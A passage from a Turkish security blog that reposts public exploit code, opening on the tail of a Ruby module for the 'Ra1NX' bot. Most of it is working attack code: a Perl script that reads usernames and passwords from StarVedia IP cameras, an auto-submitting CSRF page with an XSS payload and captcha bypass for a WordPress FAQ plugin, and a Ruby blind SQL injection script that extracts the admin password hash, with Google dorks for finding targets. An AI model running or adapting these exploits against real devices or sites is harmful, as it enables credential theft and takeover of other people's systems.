		ra1nx_command(sock)

		quit(sock)
		disconnect
	end
end

Category: Genel | Tags: "Ra1NX" Bypass Remote Exploit

admin | 25 Mart 2013

No comments

StarVedia IPCamera IC502w IC502w v020313 – Username/Password Disclosure

StarVedia IPCamera IC502w IC502w v020313 – Username/Password Disclosure Açığına ilişkin perl exploit aşağıdaki gibidir.

#!/usr/bin/perl
#
#  [ ] StarVedia IPCamera IC502w IC502w  v020313 remote bypass username/password disclosure exploit
#  Author: Todor Donev
#  Email: todor.donev at gmail dot com
#  Type: Hardware
#
#  Thanks to Tsvetelina Emirska the best friend in my life 
#  and all my other friends for the help and support which 
#  gives me. Kind regards to all of you, who read my lil&#39; 
#  exploits.
#  Bulgaria, Sofia
#  03.2013
#
#  Shodanhq r0x 4 teh lulz!!
#  http://www.youtube.com/watch?v=qNyN1AY-YZQ  Cheeerzz =))
#
#  Another bug, hint: you can edit this code and add some lines for remote change the password.
#####

use LWP::Simple;
if (@ARGV == 0) {&usg;}
while (@ARGV >  0) {
$type = shift(@ARGV);
$t = shift(@ARGV);
}
if ($type eq "-d") {
my $r = get("http://$t/cgi-bin/passwd.cgi?") or die(" $t: Not vulneruble, $!n");
print " [ ] StarVedia IPCamera IC502w IC502w  v020313 remote bypass username/password disclosure exploitn";
print " [!] Exploiting: $tn";
if ($r =~ m/ <INPUT type=text name=user size=20 maxlength=19 value="(.*)"> /g) {
$result .= "   [o] User: $1n";
}else{die(" Try another exploit, $!");}     
if ($r =~ m/ <INPUT type=password name=passwd size=20 maxlength=19 value="(.*)"> /g){
$result .= "   [o] Password: $1n";
}else{die("Try another exploit or restart the exploitn");}
sleep(1);
print " [m/] BINGO!!!na".$result; 
}
sub usg(){
print " [!] usg: perl $0 [-r or -d]  <victim:port> n";
print " [!]  -d: disclosure password optionn";
print " [!] exp: perl $0 -d 127.0.0.1  n";
exit;
}

Category: Genel | Tags: StarVedia IPCamera Açığı, StarVedia IPCamera Exploit

admin | 25 Mart 2013

No comments

WordPress IndiaNIC FAQs Manager Plugin 1.0 – Multiple Vulnerabilities

WordPress IndiaNIC FAQs Manager Plugin 1.0 – Versiyonunda bulunan CSRF açığına ilişkin exploit aşağıdaki gibidir.

 <html> 
 <!--
# Exploit Title: WordPress IndiaNIC FAQ 1.0 Plugin CSRF   XSS
# Google Dork: inurl:wp-content/plugins/faqs-manager
# Date: 21.03.2013
# Exploit Author: m3tamantra (http://m3tamantra.wordpress.com/blog)
# Vendor Homepage: http://wordpress.org/extend/plugins/faqs-manager/
# Software Link: http://downloads.wordpress.org/plugin/faqs-manager.zip
# Version: 1.0
# Tested on: Apache/2.2.16 (Debian) PHP 5.3.3-7 squeeze14 with Suhosin-Patch (cli)


##############
# Description:
##############
# IndiaNIC FAQ Settings Page is vulnerable for CSRF.
# The Ask Question area (front-end) is vulnerable for XSS. It is possible to insert  <script> alert(1) </script>  in question parameter.
# The Captcha value can be read from captcha parameter (hidden field)
#



###################################
#### Part of Ask Question form ####
###################################
 <form action="" method="POST" name="iNICfaqsAskForm_1"> 
 <input type="hidden" value="1" name="group_id"> 
 <input type="hidden" value="1" name="from_user"> 
 <input type="hidden" value="inic_faq_questions" name="action"> 
 <input type="hidden" value="5540" name="captcha">     <=================== We don&#39;t need the captcha Image when we have this xD


####################################################################
#### Request from Ask Question area (XSS in question parameter) ####
####################################################################
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1:9001
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1:9001/wordpress/?p=11
Content-Length: 143
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

group_id=1&from_user=1&action=inic_faq_questions&captcha=8560&who_asked=lalalallala@gmail.com&question=XSS TEST  <script> alert(1) </script> ?&captcha_code=8560

# When admin navigate to Question-Area (back-end) arbitrary JavaScript will execute.



#######################################################################
--> 
	 <title> Download </title> 
 <body> 

	 <!-- replace "127.0.0.1:9001/wordpress" --> 
	 <form action="http://127.0.0.1:9001/wordpress/wp-admin/admin-ajax.php" method="POST"> 
	 <input type="hidden" name="action" value="inic_faq_settings" /> 
	 <input type="hidden" name="alert_email_address" value="m3tamantra@127.0.0.1" /> 
	 <input type="hidden" name="capture_email" value="1" /> 
	 <input type="hidden" name="notify_when_answered" value="1" /> 
	 <input type="hidden" name="listing_template" value="lalalalalalalalalalalalal" /> 
	 <input type="hidden" name="custom_css" value="babaaaaaammmmmmmm" /> 
	 <input type="hidden" name="custom_js" value="alert(1234)" /> 
	 </form> 
	 <script> document.forms[0].submit(); </script> 

 </body> 
 </html>

Category: Genel | Tags: Wordpress IndiaNIC FAQ 1.0 CSRF Exploit

admin | 25 Mart 2013

One comment

WordPress IndiaNIC FAQs Manager Plugin 1.0 – Blind SQL Injection

WordPress IndiaNIC FAQs Manager Plugin 1.0 – Blind SQL Injection açığı bulunmuş olup, Açık ve Açığın oluşum yerleri hakkıda exploit

# Exploit Title: WordPress IndiaNIC FAQ 1.0 Plugin Blind SQL Injection
# Google Dork: inurl:wp-content/plugins/faqs-manager
# Date: 21.03.2013
# Exploit Author: m3tamantra (http://m3tamantra.wordpress.com/blog)
# Vendor Homepage: http://wordpress.org/extend/plugins/faqs-manager/
# Software Link: http://downloads.wordpress.org/plugin/faqs-manager.zip
# Version: 1.0
# Tested on: Apache/2.2.16 (Debian) PHP 5.3.3-7 squeeze14 with Suhosin-Patc=
h (cli)

##############
# Description:
##############
# The "order" and "orderby" parameter is vulnerable for SQL Injection
# Example URL: http://127.0.0.1:9001/wordpress/wp-admin/admin.php?page=3Din=
ic_faq&orderby=3D <sqli> 
# PoC take some time to finish (15min on my Testsystem).
# I could speed it up with Multithreading but I&#39;m to lazy right now


#### Vulnerable code part (wp_list_table.php) #############################=
###################################
#
# function prepare_items() {
#  $this-> _column_headers =3D array($this-> _columns, $this-> _hidden_columns=
, $this-> _sortable_columns);
#  $sort_order =3D isset($_GET[&#39;order&#39;]) ? $_GET[&#39;order&#39;] : "ASC";
#  $orderby_column =3D isset($_GET[&#39;orderby&#39;]) ? " ORDER BY {$_GET[&#39;orderby=
&#39;]} {$sort_order}" : false;
#
#  global $wpdb;
#  if (is_array($this-> _sql)) {
#    if ($orderby_column =3D=3D false) {
#      $data =3D $this-> _sql;
#    } else {
#      $data =3D $this-> _sql;
#      usort($data, array(&$this, &#39;usort_reorder&#39;));
#    }
#  } else {
#    $data =3D $wpdb-> get_results("{$this-> _sql}{$orderby_column}", ARRAY_A=
);
#  }
###########################################################################=
#####################################



#################################
#### Blind SQL Injection PoC ####
#################################
require "net/http"
require "uri"

$target =3D "" # EDIT ME #
$cookie =3D "" # EDIT ME # authenticated user session

# Example:
#$target =3D "http://127.0.0.1:9001/wordpress/"
#$cookie =3D "wordpress_a6a5d84619ae3f833460b386c064b9e5=3Dadmin|13640405=
45|86475c1a4fe1fc1fa5f1ebb04db1bc8f; wp-settings-1=3Deditor=html; wp-se=
ttings-time-1=3D1363441353; comment_author_a6a5d84619ae3f833460b386c064b9e5=
=3Dtony; comment_author_email_a6a5d84619ae3f833460b386c064b9e5=3Dtony@bau=
er.de; comment_author_url_a6a5d84619ae3f833460b386c064b9e5=3Dhttp://s=
ucker.de; wordpress_test_cookie=3DWP Cookie check; wordpress_logged_in_a6a5=
d84619ae3f833460b386c064b9e5=3Dadmin|1364040545|d7053b96adaa95745023b91=
694bf30ef; PHPSESSID=3D1h7f2o5defu6oa8iti6mqnevc7; bp-activity-oldestpage=
=3D1"

if $target.eql?("") or $cookie.eql?("")
    puts "n[!]tPlease set $target and $cookie variablen"
    raise
end

$chars =3D ["."]   ("a".."z").to_a   ("A".."Z").to_a   ("0".."9").to_a
$hash =3D "$P$"
$i =3D 0 # chars index
$j =3D 4 # hash index


def sqli_send()
    sqli =3D URI.escape("(CASE WHEN ((SELECT ASCII(SUBSTRING(user_pass, #{$=
j}, 1)) FROM wp_users WHERE id =3D 1) =3D #{$chars[$i].ord}) THEN 1 ELSE 1*=
(SELECT table_name FROM information_schema.tables)END) --")
    uri =3D URI.parse("#{$target}wp-admin/admin.php?page=3Dinic_faq&orderby=
=3D#{sqli}")
    http =3D Net::HTTP.new(uri.host, uri.port)
    #http.set_debug_output($stderr)
    request =3D Net::HTTP::Get.new(uri.request_uri)
    request["User-Agent"] =3D "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8;=
 rv:19.0) Gecko/20100101 Firefox/19.0"
    request["Cookie"] =3D $cookie
    resp =3D http.request(request)
    if( resp.code !=3D "200" )
        puts "something is wrong response =3D #{resp.code}"
        raise
    end
    # In WordPress default settings there will no SQL error displayed
    # but when an error apperes we don&#39;t get any result.
    # The PoC search for "No record found" and suppose there was an error
    return resp.body().match(/No record found/)=20
end

def print_status()
    output =3D "HASH: #{$hash} try #{$chars[$i]}"
    print "b"*output.length   output
end

while( $hash.length  < 34 )
    if( !sqli_send() )
        $hash  =3D $chars[$i]
        $j  =3D 1
        $i =3D 0
    else
        $i  =3D 1
    end
    print_status()
end
puts "n[ ]thave a nice day  n"

Category: Genel | Tags: WordPress IndiaNIC FAQs Manager SQL injection Açığı

« Older Entries

SecurityWeb.Org

Linux PERF_EVENTS – Local Root Exploit

Linux PERF_EVENTS – Local Root Exploit

phpMyAdmin 3.5.8 and 4.0.0-RC2 – Multiple Vulnerabilities

joomla component com_civicrm remote code injection exploit

joomla component com_civicrm remote code injection exploit:

LiquidXML Studio 2010 ActiveX Remote 0-day

Free Hosting Manager V2.0.2 Multiple SQLi

ClipShare 4.1.1 (gmembers.php, gid param) – Blind SQL Injection Vulnerability

“Ra1NX” PHP Bot pubcall Authentication Bypass Remote Code Execution

StarVedia IPCamera IC502w IC502w v020313 – Username/Password Disclosure

WordPress IndiaNIC FAQs Manager Plugin 1.0 – Multiple Vulnerabilities

WordPress IndiaNIC FAQs Manager Plugin 1.0 – Blind SQL Injection

Yazılar Takvimi

Son Yazılar

Son Yorumlar

Arşivler

Tavsiye Edilen Siteler

UserOnline

Partner links

Haziran 2013
Pts	Sal	Çar	Per	Cum	Cts	Paz
« May
					1	2
3	4	5	6	7	8	9
10	11	12	13	14	15	16
17	18	19	20	21	22	23
24	25	26	27	28	29	30

SecurityWeb.Org

Linux PERF_EVENTS – Local Root Exploit

joomla component com_civicrm remote code injection exploit:

Yazılar Takvimi

Son Yazılar

Son Yorumlar

Arşivler

Tavsiye Edilen Siteler

Etiketler

UserOnline

Partner links